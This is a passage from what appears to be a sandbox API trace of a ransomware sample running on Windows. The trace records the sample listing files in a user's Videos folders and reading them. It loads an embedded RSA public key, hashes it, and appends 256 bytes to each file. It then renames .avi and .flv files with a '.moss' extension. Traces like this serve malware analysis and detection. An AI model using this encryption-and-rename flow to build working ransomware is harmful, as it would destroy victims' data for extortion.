Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.138] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.138] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.139] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\") returned="oP1lxXXorEhMU\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\") returned="wchwPGABs3kExE1F\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\") returned="Uzo_bgWg\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57c78 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.140] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.140] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.140] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.141] PathFindFileNameW (pszPath="") returned="" [0173.141] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14cb2610, ftCreationTime.dwHighDateTime=0x1d5d80d, ftLastAccessTime.dwLowDateTime=0x3ff04430, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x3ff04430, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.141] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\2tf2Ye7SsSp.avi") returned=".avi" [0173.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\2tf2Ye7SsSp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\2tf2ye7sssp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.141] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=33892) returned 1 [0173.141] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.145] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x843e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.145] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.146] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.146] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x8464, lpOverlapped=0x0) returned 1 [0173.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.146] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.146] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0173.148] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.148] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.148] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.148] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.148] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.148] GetLastError () returned 0x0 [0173.148] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.148] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0173.148] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.148] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.148] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.148] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.149] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.149] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0173.149] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.149] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.149] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\2tf2Ye7SsSp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\2tf2ye7sssp.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\2tf2Ye7SsSp.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\2tf2ye7sssp.avi.moss")) returned 1 [0173.151] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\Sf57kpDCQOKLV0S.flv") returned=".flv" [0173.151] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\Sf57kpDCQOKLV0S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\sf57kpdcqoklv0s.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.152] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=8053) returned 1 [0173.152] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.155] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1f4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.155] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.156] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.156] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1f75, lpOverlapped=0x0) returned 1 [0173.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.157] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.157] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.157] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0173.158] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.158] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.158] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.158] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.158] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.158] GetLastError () returned 0x0 [0173.158] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.158] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0173.158] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.158] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.158] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.158] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.159] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.159] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0173.159] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1f75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.159] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.160] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\Sf57kpDCQOKLV0S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\sf57kpdcqoklv0s.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\wchwPGABs3kExE1F\\oP1lxXXorEhMU\\Sf57kpDCQOKLV0S.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\wchwpgabs3kexe1f\\op1lxxxorehmu\\sf57kpdcqoklv0s.flv.moss")) returned 1 [0173.162] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.162] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f1f0 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f138 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f360 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f2a8 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ce58 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4d020 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a070 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b424b0 | out: hHeap=0xcd0000) returned 1 [0173.162] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0173.162] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.162] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.162] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.162] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.163] RtlAllocateHeap 